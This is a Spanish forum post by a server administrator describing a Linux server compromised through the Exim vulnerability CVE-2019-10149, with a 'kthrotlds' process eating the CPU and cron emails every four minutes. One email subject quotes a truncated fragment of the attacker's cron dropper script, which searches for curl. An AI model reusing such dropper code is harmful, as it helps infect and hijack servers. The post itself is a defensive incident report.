Ingresar  \/ 
x
 Use Facebook account  Use Google account  Use Microsoft account  Use LinkedIn account
o
x
Bienvenido, Invitado

TEMA: El proceso kthrotlds se está comiendo toda la CPU de mi servidor Linux. Crontab Daemon enviando correos. Vulnerabilidad de Exim

El proceso kthrotlds se está comiendo toda la CPU de mi servidor Linux. Crontab Daemon enviando correos. Vulnerabilidad de Exim 5 años 4 meses ago #1101

  • Adesh Johnson
  • Avatar de Adesh Johnson
  • Offline
  • Administrator
  • Mensajes: 43
  • Gracias recibidas 4
  • Karma: 0
Introducción
Desde hace unos 2 días, es decir, aproximadamente desde el...

Introducción

El proceso kthrotlds se está comiendo toda la CPU de mi servidor Linux. Crontab Daemon enviando correos masivos cada 4 minutos. Vulnerabilidad de Exim CVE-2019-10149. Solución paso a paso. Desde hace unos 2 días, es decir, aproximadamente desde el 5 de Julio de 2019, me estuvieron llegando muchos correos al correo de mi dominio, enviados por el Cron Daemon. Al principio pensé que quizás tenía alguna tarea programada que estaba haciéndose y que enviaba un correo de notificación cada vez que se ejecutara. Procedí a apagar las notificaciones en mi VestaCP, que es el gestor de websites que usaba, pero no tuvo efecto. Después me dí cuenta también, usando el comando top en la consola, que había un proceso raro llamado kthrotlds que se estaba comiendo/usando toda la CPU. En las imágenes de abajo les muestro evidencia de los corrreos entrantes y el resultado de top. A la vulnerabilidad al parecer le han puesto el código CVE-2019-10149. Los asuntos de los correos eran:

Cron <root@fututel> tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "C

el proceso kthrotlds se estaba comiendo toda la cpu comando top

Leer más...
El administrador ha desactivado la escritura pública.
Tiempo de carga de la página: 0.046 segundos

Contáctenos

lineas de atencion al cl 4

Soporte

historia de soporte tecnico profesional azul 1

paga tu factura en puntos futupago

puntos futupagos